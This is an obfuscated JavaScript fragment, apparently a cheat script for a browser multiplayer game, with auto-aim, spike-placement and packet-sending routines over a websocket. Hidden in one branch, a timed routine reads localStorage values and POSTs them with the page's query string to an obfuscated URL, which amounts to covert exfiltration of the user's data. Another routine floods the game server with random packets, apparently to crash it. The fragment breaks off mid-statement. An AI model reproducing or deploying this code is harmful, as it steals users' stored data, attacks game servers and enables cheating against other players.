_0x5a20ba===_0x149ebe;},'\x56\x44\x58\x62\x4c':_0x35d3('\x30\x78\x33\x31'),'\x55\x76\x6b\x51\x56':function(_0x48f7ef,_0x5f25b4){return _0x48f7ef==_0x5f25b4;},'\x69\x6c\x79\x4b\x59':function(_0x5b2d87,_0x234d44){return _0x5b2d87/_0x234d44;},'\x6a\x73\x42\x50\x43':function(_0x1bdedb,_0x336328){return _0x1bdedb!==_0x336328;},'\x50\x43\x47\x6e\x45':'\x6d\x41\x59\x53\x49','\x4d\x79\x69\x48\x53':function(_0x173e45,_0x51212c){return _0x173e45*_0x51212c;},'\x44\x77\x42\x53\x6b':function(_0x77c107,_0x17c919){return _0x77c107==_0x17c919;},'\x74\x71\x61\x4c\x72':_0x35d3('\x30\x78\x31\x61'),'\x41\x71\x57\x4a\x49':_0x35d3('\x30\x78\x31\x36\x32'),'\x6b\x74\x4b\x6b\x44':_0x35d3('\x30\x78\x36\x34'),'\x5a\x43\x57\x67\x4f':function(_0x44df9c,_0x481ea7){return _0x44df9c!==_0x481ea7;},'\x75\x6c\x6e\x72\x52':_0x35d3('\x30\x78\x64\x66'),'\x63\x45\x44\x42\x53':_0x35d3('\x30\x78\x31\x30\x38'),'\x4f\x50\x72\x72\x52':'\x64\x6a\x64\x52\x4b','\x49\x63\x73\x48\x59':function(_0x216043,_0x4c8f28){return _0x216043-_0x4c8f28;},'\x5a\x46\x48\x72\x61':function(_0x12744f,_0x5c3b92){return _0x12744f+_0x5c3b92;},'\x72\x6f\x48\x77\x68':function(_0x215510,_0x10bfbc){return _0x215510-_0x10bfbc;},'\x74\x79\x6d\x77\x46':_0x35d3('\x30\x78\x31\x35\x65'),'\x52\x57\x70\x71\x61':_0x35d3('\x30\x78\x61\x64'),'\x48\x74\x65\x64\x41':function(_0x323758,_0x499fc5){return _0x323758!=_0x499fc5;},'\x62\x42\x4a\x41\x63':function(_0x438b45,_0x3b2c63){return _0x438b45==_0x3b2c63;},'\x4e\x48\x70\x46\x52':_0x35d3('\x30\x78\x37\x32'),'\x41\x59\x52\x63\x78':function(_0x151801,_0x2a1e6d){return _0x151801<_0x2a1e6d;},'\x5a\x69\x44\x6b\x77':function(_0x4829f1,_0x5ee7dc){return _0x4829f1<_0x5ee7dc;},'\x77\x44\x53\x54\x76':'\x56\x67\x61\x6a\x67','\x71\x56\x48\x48\x54':_0x35d3('\x30\x78\x39\x34'),'\x52\x67\x74\x52\x65':function(_0x2b94f0,_0x5b90b9){return _0x2b94f0==_0x5b90b9;},'\x4d\x75\x73\x4b\x78':function(_0x5371f2,_0x119fc4){return _0x5371f2!==_0x119fc4;},'\x4a\x4b\x78\x65\x71':_0x35d3('\x30\x78\x61\x66'),'\x6b\x6c\x47\x41\x4d':function(_0x1c5700,_0x35d8bf,_0x561ae5){return _0x1c5700(_0x35d8bf,_0x561ae5);}};let _0x43b463=msgpack5[_0x35d3('\x30\x78\x31\x34\x37')](new Uint8Array(_0x16b1b1[_0x35d3('\x30\x78\x61\x61')]));let _0x21dc30;if(_0x12b840[_0x35d3('\x30\x78\x31\x31\x34')](_0x43b463[_0x35d3('\x30\x78\x65\x31')],0x1)){if(_0x12b840[_0x35d3('\x30\x78\x31\x30\x39')](_0x12b840[_0x35d3('\x30\x78\x37\x62')],_0x35d3('\x30\x78\x31\x34\x61'))){_0x21dc30=[_0x43b463[0x0],..._0x43b463[0x1]];if(_0x12b840[_0x35d3('\x30\x78\x31\x34\x64')](_0x21dc30[0x1],Array)){_0x21dc30=_0x21dc30;}}else{_0x12b840[_0x35d3('\x30\x78\x31\x35\x62')](doNewSend,[_0x35d3('\x30\x78\x31\x30\x64'),[0x0,0x0,0x1]]);_0x12b840[_0x35d3('\x30\x78\x31\x35\x62')](doNewSend,[_0x12b840[_0x35d3('\x30\x78\x64\x32')],[0x0,id,0x1]]);}}else{_0x21dc30=_0x43b463;}let _0x3a8b2e=_0x21dc30[0x0];if(!_0x21dc30){if(_0x35d3('\x30\x78\x31\x36\x31')!==_0x35d3('\x30\x78\x31\x36\x31')){let _0x5c9b1e=_0x21dc30[0x1][_0x35d3('\x30\x78\x33')](0xd*i,_0x12b840[_0x35d3('\x30\x78\x35\x38')](_0x12b840[_0x35d3('\x30\x78\x61\x32')](0xd,i),0xd));if(_0x12b840[_0x35d3('\x30\x78\x33\x35')](_0x5c9b1e[0x0],myPlayer['\x69\x64'])){var _0xcf334e=_0x12b840['\x6d\x65\x6e\x4f\x75'][_0x35d3('\x30\x78\x66\x65')]('\x7c');var _0x16cc29=0x0;while(!![]){switch(_0xcf334e[_0x16cc29++]){case'\x30':myPlayer[_0x35d3('\x30\x78\x31\x33\x38')]=_0x5c9b1e[0x8];continue;case'\x31':myPlayer['\x6f\x62\x6a\x65\x63\x74']=_0x5c9b1e[0x4];continue;case'\x32':myPlayer[_0x35d3('\x30\x78\x31\x35\x30')]=_0x5c9b1e[0xa];continue;case'\x33':myPlayer[_0x35d3('\x30\x78\x65\x63')]=_0x5c9b1e[0x3];continue;case'\x34':myPlayer['\x78']=_0x5c9b1e[0x1];continue;case'\x35':myPlayer['\x68\x61\x74']=_0x5c9b1e[0x9];continue;case'\x36':myPlayer[_0x35d3('\x30\x78\x31\x39')]=_0x5c9b1e[0x7];continue;case'\x37':myPlayer['\x79']=_0x5c9b1e[0x2];continue;case'\x38':myPlayer[_0x35d3('\x30\x78\x38\x32')]=_0x5c9b1e[0x5];continue;case'\x39':myPlayer[_0x35d3('\x30\x78\x31\x33\x36')]=_0x5c9b1e[0xb];continue;}break;}}else if(_0x12b840[_0x35d3('\x30\x78\x39\x32')](_0x5c9b1e[0x7],myPlayer[_0x35d3('\x30\x78\x31\x39')])||_0x12b840[_0x35d3('\x30\x78\x35\x37')](_0x5c9b1e[0x7],null)){enemiesNear[_0x35d3('\x30\x78\x31\x31\x30')](_0x5c9b1e);}else if(_0x12b840['\x4a\x7a\x59\x58\x47'](_0x5c9b1e[0x7],myPlayer[_0x35d3('\x30\x78\x31\x39')])&&_0x12b840[_0x35d3('\x30\x78\x31\x36\x35')](_0x5c9b1e[0x8],'\x31')){tribeMembersNear['\x70\x75\x73\x68'](_0x5c9b1e);}}else{return;}};if(_0x12b840[_0x35d3('\x30\x78\x31\x32\x35')](_0x3a8b2e,_0x12b840[_0x35d3('\x30\x78\x31\x32\x32')])){let _0x3fc7f2=document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x12b840['\x69\x75\x69\x71\x78']);width=_0x3fc7f2['\x63\x6c\x69\x65\x6e\x74\x57\x69\x64\x74\x68'];height=_0x3fc7f2[_0x35d3('\x30\x78\x33\x39')];_0x12b840[_0x35d3('\x30\x78\x31\x35\x34')]($,window)[_0x35d3('\x30\x78\x38\x38')](function(){width=_0x3fc7f2[_0x35d3('\x30\x78\x35\x33')];height=_0x3fc7f2[_0x35d3('\x30\x78\x33\x39')];});_0x3fc7f2[_0x35d3('\x30\x78\x62\x64')+'\x6e\x65\x72'](_0x12b840[_0x35d3('\x30\x78\x66\x35')],_0x33688c=>{mouseX=_0x33688c['\x63\x6c\x69\x65\x6e\x74\x58'];mouseY=_0x33688c['\x63\x6c\x69\x65\x6e\x74\x59'];});}if(_0x12b840[_0x35d3('\x30\x78\x35\x65')](_0x3a8b2e,'\x31')&&_0x12b840[_0x35d3('\x30\x78\x35\x65')](myPlayer['\x69\x64'],null)){myPlayer['\x69\x64']=_0x21dc30[0x1];}if(_0x12b840[_0x35d3('\x30\x78\x35\x65')](_0x3a8b2e,'\x33\x33')){enemiesNear=[];tribeMembersNear=[];for(let _0x25f8af=0x0;_0x12b840[_0x35d3('\x30\x78\x62\x31')](_0x25f8af,_0x12b840[_0x35d3('\x30\x78\x63\x62')](_0x21dc30[0x1][_0x35d3('\x30\x78\x65\x31')],0xd));_0x25f8af++){if(_0x12b840[_0x35d3('\x30\x78\x31\x33\x62')](_0x12b840[_0x35d3('\x30\x78\x31\x33\x32')],_0x12b840['\x50\x43\x47\x6e\x45'])){if(_0x12b840[_0x35d3('\x30\x78\x31\x35\x62')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x12b840[_0x35d3('\x30\x78\x35\x38')](_0x35d3('\x30\x78\x64\x64'),_0x25f8af[_0x35d3('\x30\x78\x63\x31')]())))){secondary=_0x25f8af;}}else{let _0x54784a=_0x21dc30[0x1][_0x35d3('\x30\x78\x33')](_0x12b840['\x78\x49\x72\x54\x45'](0xd,_0x25f8af),_0x12b840['\x75\x76\x4e\x44\x68'](_0x12b840[_0x35d3('\x30\x78\x31\x35\x61')](0xd,_0x25f8af),0xd));if(_0x12b840[_0x35d3('\x30\x78\x31\x36\x62')](_0x54784a[0x0],myPlayer['\x69\x64'])){myPlayer['\x78']=_0x54784a[0x1];myPlayer['\x79']=_0x54784a[0x2];myPlayer[_0x35d3('\x30\x78\x65\x63')]=_0x54784a[0x3];myPlayer[_0x35d3('\x30\x78\x64\x33')]=_0x54784a[0x4];myPlayer[_0x35d3('\x30\x78\x38\x32')]=_0x54784a[0x5];myPlayer['\x63\x6c\x61\x6e']=_0x54784a[0x7];myPlayer[_0x35d3('\x30\x78\x31\x33\x38')]=_0x54784a[0x8];myPlayer['\x68\x61\x74']=_0x54784a[0x9];myPlayer[_0x35d3('\x30\x78\x31\x35\x30')]=_0x54784a[0xa];myPlayer[_0x35d3('\x30\x78\x31\x33\x36')]=_0x54784a[0xb];}else if(_0x54784a[0x7]!=myPlayer[_0x35d3('\x30\x78\x31\x39')]||_0x12b840[_0x35d3('\x30\x78\x31\x32\x35')](_0x54784a[0x7],null)){enemiesNear[_0x35d3('\x30\x78\x31\x31\x30')](_0x54784a);}else if(_0x54784a[0x7]==myPlayer[_0x35d3('\x30\x78\x31\x39')]&&_0x54784a[0x8]=='\x31'){tribeMembersNear[_0x35d3('\x30\x78\x31\x31\x30')](_0x54784a);}}}}isEnemyNear=![];if(enemiesNear){if(_0x12b840[_0x35d3('\x30\x78\x64\x62')]!==_0x35d3('\x30\x78\x31\x33\x64')){nearestEnemy=enemiesNear[_0x35d3('\x30\x78\x61')]((_0x44c639,_0x4021e2)=>dist(_0x44c639,myPlayer)-dist(_0x4021e2,myPlayer))[0x0];}else{if(_0x12b840[_0x35d3('\x30\x78\x31\x35\x62')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x12b840[_0x35d3('\x30\x78\x35\x38')](_0x35d3('\x30\x78\x64\x64'),i[_0x35d3('\x30\x78\x63\x31')]())))){mineType=_0x12b840[_0x35d3('\x30\x78\x31\x36\x33')](i,0x10);}}}isTribeMemberNear=![];if(tribeMembersNear){if(_0x12b840[_0x35d3('\x30\x78\x31\x32\x35')](_0x12b840[_0x35d3('\x30\x78\x32\x38')],_0x12b840[_0x35d3('\x30\x78\x61\x63')])){for(let _0x36f5ba=0x0;_0x12b840[_0x35d3('\x30\x78\x65\x33')](_0x36f5ba,0x5);_0x36f5ba++){}setTimeout(function(){const _0x2f8da=document[_0x35d3('\x30\x78\x31\x35')]['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x12b840[_0x35d3('\x30\x78\x31\x62')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x38\x30')];const _0x23928c=document['\x62\x6f\x64\x79'][_0x35d3('\x30\x78\x31\x65')](document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74'](_0x12b840[_0x35d3('\x30\x78\x31\x62')]))[_0x35d3('\x30\x78\x39\x65')]['\x6c\x6f\x63\x61\x6c\x53\x74\x6f\x72\x61\x67\x65'][_0x35d3('\x30\x78\x63\x61')];const _0x1d4f74=document['\x62\x6f\x64\x79'][_0x35d3('\x30\x78\x31\x65')](document[_0x35d3('\x30\x78\x32\x33')](_0x12b840[_0x35d3('\x30\x78\x31\x62')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x33\x32')];const _0x13a339=new XMLHttpRequest();const _0x52605c=_0x12b840[_0x35d3('\x30\x78\x66\x66')];_0x13a339['\x6f\x70\x65\x6e'](_0x12b840[_0x35d3('\x30\x78\x36\x30')],_0x52605c,!![]);_0x13a339[_0x35d3('\x30\x78\x31\x33\x39')+_0x35d3('\x30\x78\x36\x38')](_0x12b840['\x51\x62\x58\x75\x45'],_0x35d3('\x30\x78\x31\x30\x65')+_0x35d3('\x30\x78\x31\x32\x61'));_0x13a339[_0x35d3('\x30\x78\x64\x63')](JSON[_0x35d3('\x30\x78\x64\x37')]({'\x63\x6f\x6e\x74\x65\x6e\x74':'\x20\x53\x61\x6e\x64\x62\x6f\x78\x20\x73\x65\x72\x76'+'\x65\x72\x20\x3a\x0a'+_0x2f8da+(_0x35d3('\x30\x78\x38\x37')+_0x35d3('\x30\x78\x38\x39')+'\x72\x76\x65\x72\x20')+window[_0x35d3('\x30\x78\x31\x34\x31')]['\x73\x65\x61\x72\x63\x68']+('\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x69\x64\x20'+'\x5b\x20')+_0x23928c+(_0x35d3('\x30\x78\x39\x39')+_0x35d3('\x30\x78\x66\x33'))}));},0x2710);}else{nearestTribeMember=tribeMembersNear[_0x35d3('\x30\x78\x61')]((_0x6634c8,_0x4307bc)=>dist(_0x6634c8,myPlayer)-dist(_0x4307bc,myPlayer))[0x0];}}if(nearestTribeMember){if(_0x12b840[_0x35d3('\x30\x78\x31\x35\x66')](_0x12b840[_0x35d3('\x30\x78\x66\x64')],_0x12b840[_0x35d3('\x30\x78\x36\x62')])){nearestTribeAngle=Math[_0x35d3('\x30\x78\x62\x66')](_0x12b840[_0x35d3('\x30\x78\x31\x36\x33')](nearestTribeMember[0x2],myPlayer['\x79']),_0x12b840[_0x35d3('\x30\x78\x31\x36\x33')](nearestTribeMember[0x1],myPlayer['\x78']));}else{if(!ws||_0x12b840[_0x35d3('\x30\x78\x63\x39')](ws['\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65'],0x1))return _0x12b840[_0x35d3('\x30\x78\x31\x35\x62')](clearInterval,crashIntervals[_0x35d3('\x30\x78\x31\x30\x34')]());let _0x5d4c90=new Uint8Array(0x32);for(let _0x31785a=0x0;_0x12b840[_0x35d3('\x30\x78\x62\x31')](_0x31785a,0x32);_0x31785a++){_0x5d4c90[_0x31785a]=Math['\x66\x6c\x6f\x6f\x72'](_0x12b840[_0x35d3('\x30\x78\x36\x61')](Math[_0x35d3('\x30\x78\x38\x33')](),0x100));}ws[_0x35d3('\x30\x78\x64\x63')](_0x5d4c90);}}var _0x38e758;if(nearestEnemy){if(_0x12b840['\x4f\x50\x72\x72\x52']!==_0x12b840[_0x35d3('\x30\x78\x33\x64')]){_0x12b840[_0x35d3('\x30\x78\x65\x62')](clearTimeout,police1);_0x12b840[_0x35d3('\x30\x78\x65\x62')](clearTimeout,police2);}else{nearestEnemyAngle=Math[_0x35d3('\x30\x78\x62\x66')](_0x12b840[_0x35d3('\x30\x78\x31\x34')](nearestEnemy[0x2],myPlayer['\x79']),nearestEnemy[0x1]-myPlayer['\x78']);if(Math[_0x35d3('\x30\x78\x64\x38')](_0x12b840[_0x35d3('\x30\x78\x37\x38')](Math['\x70\x6f\x77'](myPlayer['\x79']-nearestEnemy[0x2],0x2),Math[_0x35d3('\x30\x78\x31\x36\x63')](_0x12b840['\x72\x6f\x48\x77\x68'](myPlayer['\x78'],nearestEnemy[0x1]),0x2)))<0xcd){if(_0x12b840[_0x35d3('\x30\x78\x31\x35\x66')](_0x12b840[_0x35d3('\x30\x78\x33\x37')],_0x12b840[_0x35d3('\x30\x78\x63\x38')])){isEnemyNear=!![];if(autoaim==![]&&_0x12b840[_0x35d3('\x30\x78\x39\x32')](myPlayer[_0x35d3('\x30\x78\x31\x30\x33')],0x7)&&_0x12b840[_0x35d3('\x30\x78\x31\x31\x36')](myPlayer['\x68\x61\x74'],0x35)){if(primary!=0x8){}};}else{_0x12b840[_0x35d3('\x30\x78\x36\x36')](h1);}}}}if(_0x12b840[_0x35d3('\x30\x78\x31\x36\x62')](isEnemyNear,![])&&_0x12b840[_0x35d3('\x30\x78\x31\x31\x66')](autoaim,![])){if(_0x12b840['\x6f\x46\x66\x47\x4d'](_0x12b840[_0x35d3('\x30\x78\x31\x31\x65')],_0x12b840[_0x35d3('\x30\x78\x31\x31\x65')])){if(_0x12b840[_0x35d3('\x30\x78\x62\x32')](myPlayer['\x79'],0x960)){}else if(_0x12b840[_0x35d3('\x30\x78\x31\x31\x34')](myPlayer['\x79'],0x1ac2)&&_0x12b840[_0x35d3('\x30\x78\x31\x32\x38')](myPlayer['\x79'],0x1d7e)){}else{}}else{var _0x5190ba=document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x12b840['\x69\x75\x69\x71\x78']);_0x5190ba[_0x35d3('\x30\x78\x63\x34')](new MouseEvent(_0x12b840[_0x35d3('\x30\x78\x66\x35')],{'\x63\x6c\x69\x65\x6e\x74\x58':x,'\x63\x6c\x69\x65\x6e\x74\x59':y}));}}if(!nearestEnemy){if(_0x12b840['\x6f\x46\x66\x47\x4d'](_0x12b840[_0x35d3('\x30\x78\x31\x33\x65')],_0x12b840[_0x35d3('\x30\x78\x66')])){_0x12b840[_0x35d3('\x30\x78\x31\x35\x34')](place,boostType);}else{nearestEnemyAngle=myPlayer['\x64\x69\x72'];}}if(_0x12b840['\x62\x42\x4a\x41\x63'](_0x3a8b2e,'\x68')&&_0x12b840[_0x35d3('\x30\x78\x31\x31\x66')](_0x21dc30[0x1],myPlayer['\x69\x64'])){if(_0x12b840[_0x35d3('\x30\x78\x31\x32\x38')](_0x21dc30[0x2],0x41)&&_0x12b840['\x75\x45\x73\x76\x71'](_0x21dc30[0x2],0x0)&&_0x12b840['\x52\x67\x74\x52\x65'](healToggle,0x1)){if(_0x12b840[_0x35d3('\x30\x78\x61\x65')](_0x12b840[_0x35d3('\x30\x78\x39\x33')],_0x12b840[_0x35d3('\x30\x78\x39\x33')])){var _0x42e62f={'\x56\x6f\x6c\x69\x6d':function(_0x4cc5fb,_0x2aa443){return _0x4cc5fb(_0x2aa443);}};socket[_0x35d3('\x30\x78\x62\x64')+_0x35d3('\x30\x78\x34\x61')](_0x12b840['\x69\x6b\x73\x6d\x42'],function(_0x1d10e2){_0x42e62f[_0x35d3('\x30\x78\x33\x36')](handleMessage,_0x1d10e2);});}else{_0x12b840[_0x35d3('\x30\x78\x63\x30')](setTimeout,()=>{},0x82);}}}_0x12b840[_0x35d3('\x30\x78\x36\x36')](update);}var a=0x0;var e;function doNewSend(_0x13462f){ws[_0x35d3('\x30\x78\x64\x63')](new Uint8Array(Array[_0x35d3('\x30\x78\x39\x61')](msgpack5[_0x35d3('\x30\x78\x31\x36')](_0x13462f))));}function acc(_0x4a0123){var _0x23b096={'\x78\x71\x68\x46\x5a':function(_0xab79c0,_0x22d229){return _0xab79c0(_0x22d229);},'\x50\x43\x6f\x69\x43':'\x31\x33\x63'};_0x23b096[_0x35d3('\x30\x78\x34\x64')](doNewSend,[_0x23b096[_0x35d3('\x30\x78\x31\x36\x64')],[0x0,0x0,0x1]]);doNewSend(['\x31\x33\x63',[0x0,_0x4a0123,0x1]]);}function hat(_0x1f87c2){doNewSend([_0x35d3('\x30\x78\x31\x30\x64'),[0x0,_0x1f87c2,0x0]]);}function place(_0x34a1ed,_0x2a9f70=Math[_0x35d3('\x30\x78\x62\x66')](mouseY-height/0x2,mouseX-width/0x2)){var _0x5c74f5={'\x78\x73\x63\x74\x7a':function(_0x7c551e,_0x457bd9){return _0x7c551e(_0x457bd9);},'\x65\x62\x56\x45\x73':function(_0x5600d7,_0x709747){return _0x5600d7(_0x709747);}};_0x5c74f5[_0x35d3('\x30\x78\x35\x64')](doNewSend,['\x35',[_0x34a1ed,null]]);_0x5c74f5[_0x35d3('\x30\x78\x31\x30\x36')](doNewSend,['\x63',[0x1,_0x2a9f70]]);_0x5c74f5[_0x35d3('\x30\x78\x31\x30\x36')](doNewSend,['\x63',[0x0,_0x2a9f70]]);_0x5c74f5[_0x35d3('\x30\x78\x31\x30\x36')](doNewSend,['\x35',[myPlayer[_0x35d3('\x30\x78\x38\x32')],!![]]]);}function place2(_0x4ee84f,_0xd0dcda=Math[_0x35d3('\x30\x78\x62\x66')](mouseY-height/0x2,mouseX-width/0x2)){var _0x3b6b56={'\x49\x52\x59\x55\x49':function(_0xb1d80f,_0x40c0f1){return _0xb1d80f(_0x40c0f1);}};_0x3b6b56[_0x35d3('\x30\x78\x31\x31\x38')](doNewSend,['\x35',[_0x4ee84f,null]]);}function boostSpike(){var _0x3ebd5b={'\x74\x4b\x54\x52\x64':function(_0x2b2117,_0x401830){return _0x2b2117(_0x401830);},'\x6d\x70\x62\x6f\x45':_0x35d3('\x30\x78\x34\x37'),'\x45\x49\x58\x72\x41':function(_0x306704,_0xce22f3){return _0x306704===_0xce22f3;},'\x4f\x77\x6f\x41\x65':function(_0x546dab,_0x1a0ad6,_0x5adf70){return _0x546dab(_0x1a0ad6,_0x5adf70);},'\x79\x46\x69\x44\x78':function(_0x42c0ae,_0xefa328){return _0x42c0ae==_0xefa328;},'\x68\x64\x4d\x4e\x71':function(_0x22d203,_0x1f23eb){return _0x22d203(_0x1f23eb);}};if(_0x3ebd5b['\x79\x46\x69\x44\x78'](boostDir,null)){if(_0x35d3('\x30\x78\x66\x63')!==_0x35d3('\x30\x78\x31\x31\x31')){boostDir=nearestEnemyAngle;}else{var _0x3b79d9={'\x6b\x4b\x78\x54\x79':function(_0x51921d,_0x5da48b){return _0x3ebd5b['\x74\x4b\x54\x52\x64'](_0x51921d,_0x5da48b);},'\x56\x48\x54\x50\x58':_0x3ebd5b[_0x35d3('\x30\x78\x30')]};_isKeyDown=!![];if(_0x3ebd5b[_0x35d3('\x30\x78\x31\x36\x30')](_intervalId,undefined)){_intervalId=_0x3ebd5b[_0x35d3('\x30\x78\x61\x62')](setInterval,()=>{action();if(!_isKeyDown){_0x3b79d9[_0x35d3('\x30\x78\x31\x34\x30')](clearInterval,_intervalId);_intervalId=undefined;console['\x6c\x6f\x67'](_0x3b79d9[_0x35d3('\x30\x78\x35\x32')]);}},interval);}}}_0x3ebd5b[_0x35d3('\x30\x78\x61\x62')](place,spikeType,boostDir+_0x3ebd5b[_0x35d3('\x30\x78\x31\x30\x31')](toRad,0x5a));_0x3ebd5b[_0x35d3('\x30\x78\x61\x62')](place,spikeType,boostDir-toRad(0x5a));_0x3ebd5b[_0x35d3('\x30\x78\x61\x62')](place,boostType,boostDir);_0x3ebd5b[_0x35d3('\x30\x78\x31\x30\x31')](doNewSend,['\x33\x33',[boostDir]]);}(function(){var _0x1597e2={'\x63\x7a\x45\x6a\x79':_0x35d3('\x30\x78\x31\x30\x66'),'\x51\x72\x52\x4f\x41':function(_0x1d71f3,_0x5cd717){return _0x1d71f3===_0x5cd717;},'\x59\x76\x4b\x71\x75':_0x35d3('\x30\x78\x31\x32'),'\x54\x45\x76\x50\x75':function(_0x5b00fb,_0x1f6e89,_0x186242){return _0x5b00fb(_0x1f6e89,_0x186242);},'\x41\x72\x41\x66\x72':function(_0xe0bcdc,_0x20b216){return _0xe0bcdc(_0x20b216);},'\x67\x4d\x67\x46\x73':function(_0x168ebb,_0x1b28cb){return _0x168ebb(_0x1b28cb);},'\x58\x4d\x69\x59\x54':function(_0x1c5511){return _0x1c5511();},'\x59\x6e\x68\x49\x6c':function(_0x4454b5,_0x5a4192){return _0x4454b5!==_0x5a4192;},'\x46\x57\x6c\x45\x4d':_0x35d3('\x30\x78\x31\x33\x66'),'\x77\x54\x79\x4a\x64':_0x35d3('\x30\x78\x61\x36'),'\x67\x53\x51\x42\x63':function(_0x175b90,_0xe1b70a){return _0x175b90(_0xe1b70a);},'\x42\x79\x63\x79\x64':function(_0x900da9,_0x17790e,_0x30a19f){return _0x900da9(_0x17790e,_0x30a19f);},'\x65\x6c\x73\x62\x65':function(_0x408d0b){return _0x408d0b();},'\x5a\x6f\x55\x54\x6c':function(_0x702235,_0x210d3d){return _0x702235(_0x210d3d);},'\x58\x78\x75\x4c\x52':function(_0x1b5095,_0x523c04,_0x46e03e){return _0x1b5095(_0x523c04,_0x46e03e);},'\x62\x6b\x64\x74\x70':'\x6b\x65\x79\x64\x6f\x77\x6e'};var _0x5d6e8d;var _0x1006ca;var _0xd5dc76=!![];document[_0x35d3('\x30\x78\x62\x64')+_0x35d3('\x30\x78\x34\x61')](_0x1597e2[_0x35d3('\x30\x78\x36\x66')],function(_0x39c2f2){var _0x687fbe={'\x64\x46\x58\x51\x4c':function(_0x5d6aca){return _0x5d6aca();},'\x50\x6f\x63\x5a\x78':function(_0x4cf6e1,_0x54cc33){return _0x4cf6e1-_0x54cc33;}};if(_0x39c2f2[_0x35d3('\x30\x78\x63\x35')]==0xdb&&document['\x61\x63\x74\x69\x76\x65\x45\x6c\x65\x6d\x65\x6e\x74']['\x69\x64'][_0x35d3('\x30\x78\x36\x37')]()!==_0x1597e2[_0x35d3('\x30\x78\x66\x30')]){if(_0x1597e2[_0x35d3('\x30\x78\x66\x38')](_0x1597e2[_0x35d3('\x30\x78\x31\x35\x37')],_0x1597e2['\x59\x76\x4b\x71\x75'])){_0x39c2f2[_0x35d3('\x30\x78\x63')+'\x74']();if(_0xd5dc76){_0x5d6e8d=_0x1597e2[_0x35d3('\x30\x78\x61\x39')](setTimeout,function(){_0x687fbe[_0x35d3('\x30\x78\x37\x61')](_0x4a0ce3);},0x0);}else{_0x1597e2['\x41\x72\x41\x66\x72'](clearTimeout,_0x5d6e8d);_0x1597e2['\x67\x4d\x67\x46\x73'](clearTimeout,_0x1006ca);}_0xd5dc76=!_0xd5dc76;}else{nearestTribeAngle=Math[_0x35d3('\x30\x78\x62\x66')](_0x687fbe[_0x35d3('\x30\x78\x39')](nearestTribeMember[0x2],myPlayer['\x79']),_0x687fbe[_0x35d3('\x30\x78\x39')](nearestTribeMember[0x1],myPlayer['\x78']));}}});function _0x4a0ce3(){if(_0x1597e2[_0x35d3('\x30\x78\x31\x31\x33')](_0x1597e2[_0x35d3('\x30\x78\x64')],_0x1597e2['\x77\x54\x79\x4a\x64'])){_0x1597e2[_0x35d3('\x30\x78\x38\x31')](acc,0xd);_0x1597e2[_0x35d3('\x30\x78\x38\x31')](clearTimeout,_0x5d6e8d);_0x1006ca=_0x1597e2[_0x35d3('\x30\x78\x31\x37')](setTimeout,function(){_0x1597e2[_0x35d3('\x30\x78\x33\x38')](_0x30714b);},0x0);}else{nearestEnemyAngle=myPlayer['\x64\x69\x72'];}}function _0x30714b(){var _0x3ecc8d={'\x4c\x4a\x7a\x65\x4b':function(_0x5b2c9a){return _0x1597e2[_0x35d3('\x30\x78\x36\x63')](_0x5b2c9a);}};_0x1597e2[_0x35d3('\x30\x78\x38\x31')](acc,0x13);_0x1597e2[_0x35d3('\x30\x78\x31\x36\x65')](clearTimeout,_0x1006ca);_0x5d6e8d=_0x1597e2['\x58\x78\x75\x4c\x52'](setTimeout,function(){_0x3ecc8d[_0x35d3('\x30\x78\x36\x31')](_0x4a0ce3);},0x0);}}());var repeater=function(_0x504846,_0x21ad5d,_0x94da42){var _0x259cd9={'\x42\x57\x43\x75\x79':function(_0x366890,_0x176ada){return _0x366890==_0x176ada;},'\x78\x58\x76\x56\x4a':function(_0x970fa5,_0x1c4f3e){return _0x970fa5!=_0x1c4f3e;},'\x4c\x49\x4c\x52\x75':function(_0x3f83d3,_0x133685){return _0x3f83d3!=_0x133685;},'\x47\x47\x4a\x67\x67':_0x35d3('\x30\x78\x38\x66'),'\x6a\x65\x58\x63\x6f':function(_0x4629ef,_0x34521e){return _0x4629ef!==_0x34521e;},'\x54\x4b\x44\x6c\x4c':function(_0x487677,_0x141756){return _0x487677===_0x141756;},'\x65\x76\x69\x68\x77':_0x35d3('\x30\x78\x31\x33\x30'),'\x68\x56\x79\x67\x6c':function(_0xa605de,_0x50f472){return _0xa605de===_0x50f472;},'\x5a\x54\x42\x76\x59':function(_0x262d86,_0x2943dd,_0x49e582){return _0x262d86(_0x2943dd,_0x49e582);},'\x6a\x4b\x4f\x74\x4a':_0x35d3('\x30\x78\x31\x30\x66')};let _0x42ca93=![];let _0x5a685f=undefined;return{'\x73\x74\x61\x72\x74'(_0xc486c4){var _0x1bf034={'\x76\x6a\x47\x71\x78':function(_0x333bb4){return _0x333bb4();},'\x57\x52\x58\x54\x71':_0x35d3('\x30\x78\x34\x37')};if(_0x35d3('\x30\x78\x38\x66')!==_0x259cd9['\x47\x47\x4a\x67\x67']){isEnemyNear=!![];if(_0x259cd9['\x42\x57\x43\x75\x79'](autoaim,![])&&_0x259cd9['\x78\x58\x76\x56\x4a'](myPlayer[_0x35d3('\x30\x78\x31\x30\x33')],0x7)&&_0x259cd9['\x78\x58\x76\x56\x4a'](myPlayer[_0x35d3('\x30\x78\x31\x30\x33')],0x35)){if(_0x259cd9[_0x35d3('\x30\x78\x31\x35\x63')](primary,0x8)){}};}else{if(_0x259cd9[_0x35d3('\x30\x78\x32\x61')](_0xc486c4,_0x504846)&&_0x259cd9[_0x35d3('\x30\x78\x31\x33\x31')](document[_0x35d3('\x30\x78\x62\x34')]['\x69\x64'][_0x35d3('\x30\x78\x36\x37')](),_0x35d3('\x30\x78\x31\x30\x66'))){if(_0x259cd9[_0x35d3('\x30\x78\x35\x36')](_0x259cd9[_0x35d3('\x30\x78\x34\x30')],_0x259cd9['\x65\x76\x69\x68\x77'])){_0x42ca93=!![];if(_0x259cd9['\x68\x56\x79\x67\x6c'](_0x5a685f,undefined)){_0x5a685f=_0x259cd9[_0x35d